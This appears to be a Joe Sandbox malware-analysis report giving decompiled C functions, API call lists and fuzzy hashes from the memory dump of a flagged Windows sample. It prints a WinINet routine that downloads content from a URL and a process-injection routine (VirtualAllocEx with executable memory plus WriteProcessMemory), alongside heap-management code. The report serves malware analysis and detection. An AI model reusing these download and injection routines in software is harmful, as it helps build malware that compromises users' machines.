C-Code - Quality: 60%

			E02738CBC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				char _v8;
				void* _t14;
				char* _t20;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t27;
				void* _t34;
				void* _t37;
				long _t43;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t56;
				intOrPtr _t57;

				_t56 = _t57;
				_push(0);
				_t37 = __edx;
				_t54 = __eax;
				_push(_t56);
				_push(0x2738df7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t57;
				E027248A0(__edx);
				E0272304C(0x64);
				E02727C4C( &_v8);
				_t14 = InternetOpenA(E02724D64(_v8), 1, 0, 0, 0); // executed
				 *0x27445b0 = _t14;
				if( *0x27445b0 == 0) {
					__eflags = 0;
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(0x2738dfe);
					return E027248A0( &_v8);
				} else {
					_push(_t56);
					_push(0x2738dda);
					_push( *[fs:eax]);
					 *[fs:eax] = _t57;
					_t20 = E02724D64(_t54);
					_t21 =  *0x27445b0; // 0xcc0004
					_t22 = InternetOpenUrlA(_t21, _t20, 0, 0, 0, 0); // executed
					 *0x27445b4 = _t22;
					if( *0x27445b4 == 0) {
						__eflags = 0;
						_pop(_t49);
						 *[fs:eax] = _t49;
						_push(0x2738de1);
						_t24 =  *0x27445b0; // 0xcc0004
						return InternetCloseHandle(_t24);
					} else {
						_push(_t56);
						_push(0x2738dba);
						_push( *[fs:eax]);
						 *[fs:eax] = _t57;
						do {
							_t27 =  *0x27445b4; // 0xcc000c
							InternetReadFile(_t27, 0x27445b8, 0x401, 0x27449bc); // executed
							_t43 =  *0x27449bc; // 0x0
							E02724990(0x2744b70, _t43, 0x27445b8, 0);
							_t51 =  *0x2744b70; // 0x0
							E02724B6C(_t37, _t51);
						} while ( *0x27449bc != 0);
						_pop(_t52);
						 *[fs:eax] = _t52;
						_push(0x2738dc1);
						_t34 =  *0x27445b4; // 0xcc000c
						return InternetCloseHandle(_t34);
					}
				}
			}

0x02738cbd
0x02738cbf
0x02738cc3
0x02738cc5
0x02738cc9
0x02738cca
0x02738ccf
0x02738cd2
0x02738cd7
0x02738ce9
0x02738cf2
0x02738d00
0x02738d05
0x02738d11
0x02738de1
0x02738de3
0x02738de6
0x02738de9
0x02738df6
0x02738d17
0x02738d19
0x02738d1a
0x02738d1f
0x02738d22
0x02738d2f
0x02738d35
0x02738d3b
0x02738d40
0x02738d4c
0x02738dc1
0x02738dc3
0x02738dc6
0x02738dc9
0x02738dce
0x02738dd9
0x02738d4e
0x02738d50
0x02738d51
0x02738d56
0x02738d59
0x02738d5c
0x02738d6b
0x02738d71
0x02738d80
0x02738d86
0x02738d8d
0x02738d93
0x02738d98
0x02738da3
0x02738da6
0x02738da9
0x02738dae
0x02738db9
0x02738db9
0x02738d4c

APIs

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02738D00
InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,00000000,00000000), ref: 02738D3B
InternetReadFile.WININET(00CC000C,027445B8,00000401,027449BC), ref: 02738D71
InternetCloseHandle.WININET(00CC000C), ref: 02738DB4
InternetCloseHandle.WININET(00CC0004), ref: 02738DD4

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID:
API String ID: 3121278467-0
Opcode ID: e649140fff753297c6799cdd9c128700acf568d5e7c6d3810ecd682f7487bc4f
Instruction ID: 5204afe84c06c561c72f922d3f8144f8ae3e2afef161227b7cf0ec09b07a4640
Opcode Fuzzy Hash: e649140fff753297c6799cdd9c128700acf568d5e7c6d3810ecd682f7487bc4f
Instruction Fuzzy Hash: 4D31F4757407A0AFFB23EB65EC26B25BBE9F749B00F51482AF100D6680C7746814EA14

Uniqueness

Uniqueness Score: -1.00%

Function 02735AD8 Relevance: 3.0, APIs: 2, Instructions: 26
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02735AD8(void* __eax, long __ecx, void* __edx) {
				void* _t2;
				void* _t5;
				void* _t8;
				long _t9;
				void* _t10;

				_t9 = __ecx;
				_t10 = __edx;
				_t5 = __eax;
				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
				_t8 = _t2;
				WriteProcessMemory(_t5, _t8, _t10, _t9, 0x2744518); // executed
				return _t8;
			}

0x02735adc
0x02735ade
0x02735ae0
0x02735aed
0x02735af2
0x02735afd
0x02735b08

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,02735B24), ref: 02735AED
WriteProcessMemory.KERNEL32(?,00000000,?,?,02744518,?,00000000,?,00003000,00000040,?,?,?,?,02735B24), ref: 02735AFD

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AllocMemoryProcessVirtualWrite
String ID:
API String ID: 645232735-0
Opcode ID: a02bc8397de7880335c775db80b57103a8477beb76e6768e23c69dd6ec2ea3a6
Instruction ID: a0a86984393825f405856d5713ae69679d43031c496fa339a1fe228901df0c2d
Opcode Fuzzy Hash: a02bc8397de7880335c775db80b57103a8477beb76e6768e23c69dd6ec2ea3a6
Instruction Fuzzy Hash: EAD09EA238237836E535206B2C49F675E9DCBC6AB6E150076B749A6181DC95AC0441F8

Uniqueness

Uniqueness Score: -1.00%

Function 02735770 Relevance: 1.5, APIs: 1, Instructions: 17
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02735770(int __eax, int __edx) {
				void* _t4;
				int _t5;

				_t5 = __eax;
				if(E027354F4() == 0) {
					return 0;
				} else {
					_t4 = CreateToolhelp32Snapshot(_t5, __edx); // executed
					return _t4;
				}
			}

0x02735774
0x0273577d
0x0273578e
0x0273577f
0x02735781
0x02735789
0x02735789

APIs

Part of subcall function 027354F4: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0273577B,?,?,0273580D,00000000,027358E9), ref: 02735508
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02735520
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02735532
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02735544
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02735556
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02735568
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0273557A
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0273558C
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0273559E
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 027355B0
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 027355C2
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 027355D4
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 027355E6
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Module32First), ref: 027355F8
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0273560A
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0273561C
Part of subcall function 027354F4: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0273562E

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02735781

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
String ID:
API String ID: 2242398760-0
Opcode ID: 96395959155b57f60af0c6b856b4d8fcc07316af79195d5d4707048855fe5eee
Instruction ID: fe0d986b7fab3671f46c26a1dd6bbd068c3e3151213dbb4ce43a44d3acd5b094
Opcode Fuzzy Hash: 96395959155b57f60af0c6b856b4d8fcc07316af79195d5d4707048855fe5eee
Instruction Fuzzy Hash: 48C08CA26022205B8B2166FC3CC88C3478CDE8E1BB34808A3B909E3103D7268C20A6A0

Uniqueness

Uniqueness Score: -1.00%

Function 02721754 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E02721754(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t129 =  *0x2741045; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E02721674();
								_t99 =  *0x27437a8; // 0x7f9e0000
								 *_t147 = 0x27437a4;
								 *0x27437a8 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x27437a0 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x2741710], ah");
								if(__eflags == 0) {
									goto L39;
								}
								Sleep(0);
								asm("lock cmpxchg [0x2741710], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L39;
							}
						}
						L39:
						_t141 = _t125 - 0xb30;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x2741720 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x274171c;
							if((0xfffffffe << _t132 &  *0x274171c) == 0) {
								_t133 =  *0x2741718; // 0x54ad0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E027215FC(_t125);
								} else {
									_t110 =  *0x2741714; // 0x4984ae0
									_t109 = _t110 - _t125;
									 *0x2741714 = _t109;
									 *0x2741718 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x2741710 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L47;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L47:
							_push(_t152);
							_push(_t145);
							_t148 = 0x27417a0 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x2741720 + _t142 * 4;
								 *_t80 =  *(0x2741720 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x274171c], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E02721530(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							 *(_t159 - 4) = _t125 + 2;
							 *0x2741710 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					__eax =  *(__edx + 0x27415b8) & 0x000000ff;
					__ebx = 0x2740044 + ( *(__edx + 0x27415b8) & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									__eflags = __ebx;
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [ebx], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 4);
					__eax =  *(__edx + 8);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x10);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0xc);
						if(__eax >  *(__ebx + 0xc)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x2741045;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x2741710], ah");
									if(__eflags == 0) {
										goto L20;
									}
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [0x2741710], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
									goto L20;
								}
							}
							L20:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x274171c;
							__eflags =  *(__ebx + 1) &  *0x274171c;
							if(( *(__ebx + 1) &  *0x274171c) == 0) {
								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
								__edi =  *0x2741718; // 0x54ad0
								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
									__edi = __eax;
									__eax = E027215FC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L33;
									} else {
										 *0x2741710 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x2741714; // 0x4984ae0
									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x2741718 =  *0x2741718 - __edi;
									 *0x2741714 = __esi;
									goto L33;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x2741720 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x2741720 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x27417a0 + ( *(0x2741720 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x2741720 + __eax * 4;
									 *_t38 =  *(0x2741720 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x274171c], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E02721530(__eax, __ecx, __edx);
								}
								L33:
								_t56 = __edi + 6; // 0x54ad6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x2741710 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 8)) = 0;
								 *((intOrPtr*)(__esi + 0xc)) = 1;
								 *(__ebx + 0x10) = __esi;
								_t61 = __esi + 0x20; // 0x4984b00
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 8) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0xc) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0xc;
							 *_t19 =  *(__edx + 0xc) + 1;
							__eflags =  *_t19;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 4);
							 *(__ecx + 0x14) = __ebx;
							 *(__ebx + 4) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x02721760
0x02721766
0x02721998
0x0272199d
0x02721ab0
0x02721ab1
0x02721ab3
0x027216b4
0x027216b8
0x027216c4
0x027216d4
0x027216d9
0x027216dd
0x027216df
0x027216e1
0x027216e7
0x027216ea
0x027216ef
0x027216f4
0x027216fa
0x02721700
0x02721703
0x02721705
0x0272170c
0x0272170c
0x02721715
0x02721ab9
0x02721ab9
0x02721abb
0x02721abb
0x027219a3
0x027219af
0x027219b2
0x027219b4
0x02721968
0x0272196d
0x02721975
0x00000000
0x00000000
0x02721979
0x02721983
0x0272198b
0x0272198f
0x00000000
0x0272198f
0x00000000
0x0272198b
0x02721968
0x027219b6
0x027219b6
0x027219be
0x027219c1
0x027219cb
0x027219cb
0x027219d2
0x027219e5
0x027219e9
0x027219ef
0x02721a08
0x02721a0e
0x02721a0e
0x02721a10
0x02721a2e
0x02721a12
0x02721a12
0x02721a17
0x02721a19
0x02721a1e
0x02721a27
0x02721a27
0x02721a33
0x02721a3b
0x027219f1
0x027219f1
0x027219fb
0x02721a03
0x00000000
0x02721a03
0x027219d4
0x027219d7
0x027219da
0x02721a3c
0x02721a3c
0x02721a3d
0x02721a3e
0x02721a45
0x02721a48
0x02721a4b
0x02721a4e
0x02721a50
0x02721a52
0x02721a59
0x02721a5b
0x02721a5b
0x02721a5b
0x02721a62
0x02721a64
0x02721a64
0x02721a62
0x02721a70
0x02721a75
0x02721a75
0x02721a77
0x02721a98
0x02721a98
0x02721a98
0x02721a79
0x02721a79
0x02721a7f
0x02721a82
0x02721a86
0x02721a8c
0x02721a8e
0x02721a8e
0x02721a8c
0x02721aa0
0x02721aa3
0x02721aaf
0x02721aaf
0x027219d2
0x0272176c
0x0272176c
0x0272176e
0x02721775
0x0272177c
0x027217d4
0x027217d4
0x027217d9
0x027217dd
0x00000000
0x00000000
0x027217df
0x027217df
0x027217e2
0x027217e7
0x027217eb
0x027217ed
0x027217ed
0x027217f0
0x027217f5
0x027217f9
0x027217fb
0x027217fb
0x02721800
0x02721805
0x0272180a
0x0272180e
0x02721816
0x00000000
0x02721816
0x0272180e
0x027217f9
0x00000000
0x027217eb
0x027217d4
0x0272177e
0x0272177e
0x02721781
0x02721784
0x02721789
0x0272178b
0x027217a4
0x027217a7
0x027217ab
0x027217ad
0x027217b0
0x02721820
0x02721821
0x02721822
0x02721829
0x0272182b
0x0272182b
0x02721830
0x02721838
0x00000000
0x00000000
0x0272183c
0x02721841
0x02721846
0x0272184e
0x02721852
0x00000000
0x02721852
0x00000000
0x0272184e
0x0272182b
0x0272185c
0x02721860
0x02721860
0x02721866
0x027218d8
0x027218dc
0x027218e2
0x027218e4
0x0272190c
0x02721910
0x02721912
0x02721917
0x02721919
0x0272191b
0x00000000
0x0272191d
0x0272191d
0x02721922
0x02721924
0x02721925
0x02721926
0x02721927
0x02721927
0x027218e6
0x027218e6
0x027218ec
0x027218f0
0x027218f6
0x027218f8
0x027218fa
0x027218fa
0x027218fc
0x027218fe
0x02721904
0x00000000
0x02721904
0x02721868
0x02721868
0x0272186b
0x02721872
0x02721879
0x0272187c
0x0272187f
0x02721886
0x02721889
0x0272188c
0x0272188f
0x02721891
0x02721893
0x02721895
0x0272189a
0x0272189c
0x0272189c
0x0272189c
0x027218a3
0x027218a5
0x027218a5
0x027218a3
0x027218ac
0x027218b1
0x027218b4
0x027218ba
0x02721928
0x02721928
0x02721928
0x027218bc
0x027218bc
0x027218be
0x027218c2
0x027218c4
0x027218c7
0x027218ca
0x027218cd
0x027218d1
0x027218d1
0x0272192d
0x0272192d
0x0272192d
0x02721930
0x02721933
0x02721935
0x0272193a
0x0272193c
0x0272193f
0x02721946
0x02721949
0x02721949
0x0272194c
0x02721950
0x02721953
0x02721956
0x02721958
0x02721958
0x0272195a
0x0272195d
0x02721960
0x02721963
0x02721964
0x02721965
0x02721966
0x02721966
0x027217b2
0x027217b2
0x027217b2
0x027217b2
0x027217b6
0x027217b9
0x027217bc
0x027217bf
0x027217c0
0x027217c0
0x0272178d
0x0272178d
0x02721791
0x02721791
0x02721794
0x02721797
0x0272179a
0x027217c4
0x027217c7
0x027217ca
0x027217cd
0x027217d0
0x027217d1
0x0272179c
0x0272179c
0x0272179f
0x027217a0
0x027217a0
0x0272179a
0x0272178b

APIs

Sleep.KERNEL32(00000000), ref: 02721800
Sleep.KERNEL32(0000000A,00000000), ref: 02721816

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 71ff26c441f700799f94e914acb6b3db86680ab43fad8adb6bdb4505103b0ab7
Instruction ID: ba5d4ff4389b6c2cb66fd911c86e49f196b5aace9b3958a4012ef51691ae4222
Opcode Fuzzy Hash: 71ff26c441f700799f94e914acb6b3db86680ab43fad8adb6bdb4505103b0ab7
Instruction Fuzzy Hash: 38B1477AA003628BC716DF28D8C4755BBE1FB81320F99C6BED45D8B386C7709599CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02721ABC Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E02721ABC(void* __eax, void* __edi) {
				signed int __ebx;
				void* _t50;
				signed int _t51;
				signed int _t52;
				signed int _t54;
				void _t57;
				int _t58;
				signed int _t65;
				void* _t67;
				signed int _t69;
				intOrPtr _t70;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				void* _t82;
				void _t85;
				void* _t87;
				void* _t89;

				_t48 = __eax;
				_t77 =  *(__eax - 4);
				_t65 =  *0x2741045; // 0x0
				if((_t77 & 0x00000007) != 0) {
					__eflags = _t77 & 0x00000005;
					if((_t77 & 0x00000005) != 0) {
						_pop(_t65);
						__eflags = _t77 & 0x00000003;
						if((_t77 & 0x00000003) != 0) {
							return 0xffffffff;
						} else {
							_push(_t65);
							_t67 = __eax - 0x10;
							E02721674();
							_t50 = _t67;
							_t85 =  *_t50;
							_t82 =  *(_t50 + 4);
							_t51 = VirtualFree(_t67, 0, 0x8000); // executed
							if(_t51 == 0) {
								_t52 = _t51 | 0xffffffff;
								__eflags = _t52;
							} else {
								 *_t82 = _t85;
								 *(_t85 + 4) = _t82;
								_t52 = 0;
							}
							 *0x27437a0 = 0;
							return _t52;
						}
					} else {
						goto L21;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L6;
							}
							Sleep(0);
							__edx = __edx;
							__ecx = __ecx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags != 0) {
								Sleep(0xa);
								__edx = __edx;
								__ecx = __ecx;
								continue;
							}
							goto L6;
						}
					}
					L6:
					_t6 = __edx + 0xc;
					 *_t6 =  *(__edx + 0xc) - 1;
					__eflags =  *_t6;
					__eax =  *(__edx + 8);
					if( *_t6 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L12:
							 *(__ebx + 0xc) = __eax;
						} else {
							__eax =  *(__edx + 0x14);
							__ecx =  *(__edx + 4);
							 *(__eax + 4) = __ecx;
							 *(__ecx + 0x14) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
								goto L12;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x2741045; // 0x0
						L21:
						__eflags = _t65;
						_t69 = _t77 & 0xfffffff0;
						_push(_t84);
						_t87 = _t48;
						if(__eflags != 0) {
							while(1) {
								_t54 = 0x100;
								asm("lock cmpxchg [0x2741710], ah");
								if(__eflags == 0) {
									goto L22;
								}
								Sleep(0);
								_t54 = 0x100;
								asm("lock cmpxchg [0x2741710], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L22;
							}
						}
						L22:
						__eflags = (_t87 - 4)[_t69] & 0x00000001;
						_t75 = (_t87 - 4)[_t69];
						if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
							_t54 = _t69 + _t87;
							_t76 = _t75 & 0xfffffff0;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E027214F0(_t54);
							}
						} else {
							_t76 = _t75 | 0x00000008;
							__eflags = _t76;
							(_t87 - 4)[_t69] = _t76;
						}
						__eflags =  *(_t87 - 4) & 0x00000008;
						if(( *(_t87 - 4) & 0x00000008) != 0) {
							_t76 =  *(_t87 - 8);
							_t87 = _t87 - _t76;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E027214F0(_t87);
							}
						}
						__eflags = _t69 - 0x13fff0;
						if(_t69 == 0x13fff0) {
							__eflags =  *0x2741718 - 0x13fff0;
							if( *0x2741718 != 0x13fff0) {
								_t70 = _t87 + 0x13fff0;
								E02721590(_t54);
								 *((intOrPtr*)(_t70 - 4)) = 2;
								 *0x2741718 = 0x13fff0;
								 *0x2741714 = _t70;
								 *0x2741710 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t89 = _t87 - 0x10;
								_t57 =  *_t89;
								_t79 =  *(_t89 + 4);
								 *(_t57 + 4) = _t79;
								 *_t79 = _t57;
								 *0x2741710 = 0;
								_t58 = VirtualFree(_t89, 0, 0x8000);
								__eflags = _t58 - 1;
								asm("sbb eax, eax");
								return _t58;
							}
						} else {
							 *(_t87 - 4) = _t69 + 3;
							 *(_t87 - 8 + _t69) = _t69;
							E02721530(_t87, _t76, _t69);
							 *0x2741710 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 8) = __ecx;
						 *(__ecx - 4) = __eax;
